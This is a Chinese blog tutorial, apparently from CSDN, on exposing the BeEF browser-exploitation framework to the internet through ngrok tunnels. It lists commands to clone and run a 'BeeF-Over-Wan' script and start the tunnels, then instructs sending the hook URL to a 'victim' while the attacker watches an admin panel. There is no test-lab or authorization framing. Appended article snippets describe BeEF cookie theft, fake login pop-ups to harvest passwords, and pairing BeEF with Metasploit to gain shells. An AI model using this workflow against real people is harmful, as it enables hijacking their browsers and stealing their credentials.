BeEF+ngrok实现内网穿透效果的主机控制

最新推荐文章于 2022-09-05 20:30:00 发布
原创 最新推荐文章于 2022-09-05 20:30:00 发布 · 1.3k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何使用NGROK进行端口转发,并结合BeEF框架实现远程攻击的过程。从下载安装到配置运行,再到管理页面的访问及攻击链接的发送,为读者提供了完整的操作步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

NGROK:https://bin.equinox.io

BeEFhttps://github.com/sdfzy/BeeF-Over-Wan

1.先去下载linux 版本的ngrok

2.zip压缩包放到/usr/local/bin目录下解压并配置 token

3.切换到/root/.ngrok2目录配置ngrok.yml文件

把BeEF需要监听的内容写入ngrok.yml

4.下载BeFF并执行

cd /usr/local/bin/ git clone https://github.com/sdfzy/BeeF-Over-Wan.git cd BeeF-Over-Wan/ chmod +x BeeFOverWan.py pip install termcolor python BeeFOverWan.py

选择:1

5.

另开一个终端 输入

ngrok start --all

我们需要把80的地址发给受害者,3000的地址是我们自己的管理页面

回到刚刚那个终端分别输入你的 攻击地址和你的管理地址(注意不要带http)

之后就会出现配置信息

6.

输入 http://9b68b422.ngrok.io/ui/authentication    就能打开管理页面

7.把攻击连接给受害者访问

http://de62b766.ngrok.io/beef.html

8.测试

漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)
m0_61506558的博客
08-04 1933
并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口 探测、攻击内网网站等危害。,'.yourid.ceye.io/jinyiuxin'))),1,0) 黑体处拼接SQL语句。gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代。第三方网站利用被攻击网站生效的cookie,直接对服务器接口发起请求。抓取正常通信请求的数据包,再请求一次。.........
网安工具系列:kali之beef的基础使用
最新发布
weixin_54626591的博客
04-07 1261
kali之beef的基础使用
beef-xss+Sunny-Ngrok实现内网穿透
qq_32006199的博客
07-15 1294
一、实验工具 1、kali linux 2019.1-vm-amd64 2、beef-xss 3、sunny-ngrok 二、步骤 1、运行sunny程序 ./sunny clientid 隧道id 2、自定义监听端口并开启beef-xss 修改配置文件,配置文件路径:/etc/beef-xss/config.yam 启动beef-xss beef-xss 3、在目标网站的注入点进行xss...
beef + msf 实现内网渗透
weixin_30416497的博客
04-10 617
在内网渗透方面,最为大众所知道的就是xp系统的ms08067漏洞,通过这个漏洞可以对未打上补丁的xp系统实现getshell, 但是经过笔者发现,这种漏洞攻击在被攻击机开上windows防火墙的时候是没用的(连ping都会被拒绝),但是arp+dns欺骗仍然是可行的 那么问题来了,我们如何通过内网欺骗来getshell? 在被攻击机开启防火墙的时候,可以看到使用ms08067漏洞未...
【渗透测试笔记】之【将本地beef侦听的端口远程端口转发到云服务器】
AA8j的博客
12-27 614
1. 首先配置vps的ssh,允许外部访问vps端口: vi /etc/ssh/sshd_config 将 #GatewayPorts no 改为: GatewayPorts yes 2. vps添加防火墙规则,运行外网访问7000端口,并重启vps: 3. 在kali上进行远程端口转发,将本地beef侦听的3000转发到vps的7000端口上: ssh -CfNg -R 7000:127.0.0.1:3000 root@1.2.3.4 CfNg参数作用是压缩带宽,后台并发连接。 末尾跟vpsIP
BeEF
MyDriverC
12-16 1582
一、BeEF简介   BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。可在其官网找到更详细的介绍http://beefproject.com/。   二、安装BeEF   先下载Beef最新版本   $ svn checkout http://beef.googlecode.com/svn/track/ beef   $ ruby install
beef +metasploit关联拿shell教程
Johnathan的博客
03-01 759
参考了网络很多大神文章,简单小结一下,仅供参考 手动关联 beef + msf 1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true 2,配置vim /usr/share/beef-xss/...
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
beef获取目标主机用户名和密码.docx
03-29
* Shell 获取:Beef 可以获取目标主机的 Shell 访问权限,允许用户远程控制目标主机。 三、使用 Beef 获取目标主机用户名和密码 使用 Beef 获取目标主机用户名和密码需要以下几个步骤: * 安装和配置 Beef:首先...
kali beef + msf整合 可用配置
x631617479的博客
12-30 902
配置beef开启msf vim /usr/share/beef-xss/config,yaml 开启msf配置 vim /usr/share/beef-xss/extensions/metasploit/config.yaml 启动beef 一定要先到beef路径 使用./ 启动 cd /usr/share/beef-xss/ ./beef 判断是否成功 ...
beef +metasploit关联
qq_2411772106的博客
07-24 441
参考了网络很多大神文章,简单小结一下,仅供参考 1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true 2,配置vim /usr/share/beef-xss/extensions/metasploit/config.yaml,修改此文件配置两处ip为kali自身ip 3,首次启动msf,先启动postgresql数据库服务service postgresql restart,再启动msfconsole 4,ms
metasploit利用IE漏洞XSS挂马拿内网主机
代码析构师的专栏
08-07 1045
metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用。 系统:KALI 用到的工具:beEF+msf  利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf MS12-063  Automatic IE 7 on Windows
【渗透测试工具beef】XSS渗透测试工具beef如何安装使用?
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
04-25 7682
目录 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 .
原来frp内网穿透这么搞-学习了
programmer_trip的博客
07-18 509
目前买了树莓派,安装了centos7系统,现在想让外网的电脑能ssh同时也可以域名访问内网的项目,这个时候就需要实现内网穿透,看了很多工具,尝试了一下frp的方式,成功实现内网穿透,特此记录 首先得有一个具有公网ip的服务器,这里我之前已经买了阿里云的服务器,一年80多 因为我内网服务器(树莓派服务器)和阿里云服务器装的都是centos7系统,因此整体环境为Linux系统,这里内网服务器作为客户端,阿里云服务器最为服务端 下载frp压缩包 frp历史版本地址 在这里插入图片描述 ...
浏览器利用框架BeEF测试
★慕名斋★
11-07 2639
0×00 前言 http://www.vuln.cn/6966 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。 0×01 简介 工具主页:http://beefproject.com
webwell安全工具-BeEF
凯歌响起的博客
09-05 2079
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。​ BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。
神器 | kali工具之Beef
南迪叶先森
07-06 1178
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 声明:本工具仅供技术分享、交流讨论,严禁用于非法用途。 简介 Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 http://beefproject.com 主要功能 信息收集: 1.网络发现 2.主机信息 3.Cookie获取 4..
Metasploit+Beef整合攻击——超详细
渗透测试
08-01 2859
文章目录前言一、准备工作1.配置beef2.配置Metasploit二、实际操作三、Beef隧道代理总结 前言 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机beef属于c/s结构,具体看图 zombie(僵尸)即受害的浏览器。zombie是被hook(勾
xss利用之kali神器beef
热门推荐
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
利用Beef获取目标主机用户名与密码:实战教程
- 配置beef,首先在MSF(Metasploit Framework)控制台上关联beef,通过编辑`config.yaml`文件,启用所需的模块,并指定回调服务器地址为Kali主机的IP地址(192.168.1.2)。 2. **利用beef获取shell**: - 启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值